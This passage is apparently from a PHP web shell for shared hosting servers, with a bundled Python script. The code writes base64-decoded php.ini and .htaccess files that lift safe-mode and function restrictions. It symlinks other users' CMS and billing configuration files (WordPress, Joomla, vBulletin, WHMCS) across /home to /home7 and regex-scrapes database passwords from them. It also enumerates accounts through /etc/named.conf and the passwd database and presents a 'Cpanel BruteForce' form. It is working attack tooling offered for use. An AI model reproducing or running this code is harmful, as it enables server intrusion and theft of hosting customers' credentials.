  2026.     cleanup = subprocess.Popen('rm -rf /tmp/data.txt > /dev/null', shell=True).wait()
  2027.   if system() == 'Windows':
  2028.     cleanup = subprocess.Popen('del C:\data.txt', shell=True).wait()
  2029.   print '\n', '-' * 100, '\n'
  2030.   if system() == 'Linux':
  2031.     for root, dirs, files in os.walk(fout):
  2032.       for fname in files:
  2033.         fullpath = os.path.join(root, fname)
  2034.         f = open(fullpath, 'r')
  2035.         for line in f:
  2036.           secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
  2037.           if secr is not None: print (secr.group(2))  
  2038.           secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
  2039.           if secr1 is not None:  print  (secr1.group(2))
  2040.           secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
  2041.           if secr2 is not None: print (secr2.group(3))
  2042.           secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
  2043.           if secr3 is not None: print (secr3.group(2))
  2044.           secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
  2045.           if secr4 is not None: print (secr4.group(2))
  2046.           secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
  2047.           if secr5 is not None: print (secr5.group(2))
  2048.           secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
  2049.           if secr6 is not None: print (secr6.group(2))
  2050.           secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
  2051.           if secr7 is not None: print (secr7.group(2))
  2052.         f.close()
  2053.   if system() == 'Windows':
  2054.     for infile in glob.glob( os.path.join(fout, '*.txt') ):
  2055.       f = open(infile, 'r')
  2056.       for line in f:
  2057.         secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
  2058.         if secr is not None: print (secr.group(2))  
  2059.         secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
  2060.         if secr1 is not None:  print  (secr1.group(2))
  2061.         secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
  2062.         if secr2 is not None: print (secr2.group(3))
  2063.         secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
  2064.         if secr3 is not None: print (secr3.group(2))
  2065.         secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
  2066.         if secr4 is not None: print (secr4.group(2))
  2067.         secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
  2068.         if secr5 is not None: print (secr5.group(2))
  2069.         secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
  2070.         if secr6 is not None: print (secr6.group(2))
  2071.         secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
  2072.         if secr7 is not None: print (secr7.group(2))
  2073.       f.close()
  2074. except (KeyboardInterrupt):
  2075.   print '\nThanks for using it ._^''; $file = fopen("cp.py","w+"); $write = fwrite ($file ,base64_decode($cp)); fclose($file); chmod("cp.py",0755); $url = $_POST['url']; echo"<center>
  2076. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">"; system("python cp.py $url config"); unlink ('cp.py'); echo"</textarea>
  2077. </center>"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['matikan']=='sekatan'){ @error_reporting(0); $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ=='; $file = fopen("php.ini","w+"); $write = fwrite ($file ,base64_decode($phpini)); fclose($file); $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ=='; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); echo "<hr><center><b>DONE!"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  2078. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  2079. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  2080. '; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo "</table>"; unlink("test.txt"); echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } ?>
  2081. <form method="POST" target="_blank">
  2082.     <strong>
  2083. <input name="page" type="hidden" value="find"><table>                  
  2084.     </strong><br><br><center><font size="5" style="italic" color="#FF0000">--==[ Cpanel BruteForce ]==--</font></center><br><br>
  2085.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  2086.     <tr>
  2087.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2088.     <center><b><font size="5" style="italic" color="#FF0000">Cpanel BruteForce</font></b></center></td></tr>
  2089.     <tr>
  2090.     <td>
  2091.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  2092.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2093.     <strong>User :</strong></td>
  2094.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
  2095.     </tr>
  2096.     <tr>
  2097.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2098.     <strong>Pass :</strong></td>
  2099.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
  2100.     </tr>
  2101.     <tr>
  2102.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  2103.     <strong>Type :</strong></td>
  2104.     <td valign="top" bgcolor="#151515" colspan="5">
  2105.     <span class="style2"><strong>Simple : </strong> </span>
  2106.     <strong>
  2107.     <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  2108.     <font class="style2"><strong>/etc/passwd : </strong> </font>
  2109.     <strong>
  2110.     <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  2111.     </strong>
  2112.     </span>
  2113.     </td>
  2114.     </tr>
  2115.     <tr>
  2116.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  2117.     <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
  2118.     </strong>
  2119.     </td>
  2120.     <tr>
  2121. </form>
  2122. <tr>
  2123.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
  2124.                     </tr>
  2125. <form method="POST" target="_blank">
  2126.     <strong>
  2127. <input name="mendapatkan" type="hidden" value="passwd">                    
  2128.     </strong>
  2129.     <tr>
  2130.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
  2131.     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
  2132.     </strong>
  2133.     </td>
  2134.     </tr>
  2135.     <tr>
  2136.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  2137.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  2138.     </strong>
  2139.     </td>
  2140.     <tr>
  2141. </form>  
  2142. <tr>
  2143.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
  2144.                     </tr>
  2145. <form method="POST" target="_blank">
  2146.     <strong>
  2147. <input name="pass" type="hidden" value="password">                     
  2148.     </strong>
  2149.     <tr>
  2150.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
  2151.     <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
  2152.     </strong>
  2153.     </td>
  2154.     </tr>
  2155.     <tr>
  2156.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  2157.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
  2158.     </strong>
  2159.     </td>
  2160.     <tr>
  2161. </form>
  2162. <tr>
  2163.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  2164.     Security</strong></td>
  2165.                     </tr>
  2166.     <tr>
  2167.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  2168.     <td valign="top" bgcolor="#151515" colspan="5">
  2169.     <strong>
  2170. <?php $safe_mode = ini_get('safe_mode'); if($safe_mode=='1') { echo 'ON'; }else{ echo 'OFF'; } ?>  
  2171.     </strong>  
  2172.     </td>
  2173.                     </tr>
  2174.     <tr>
  2175.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
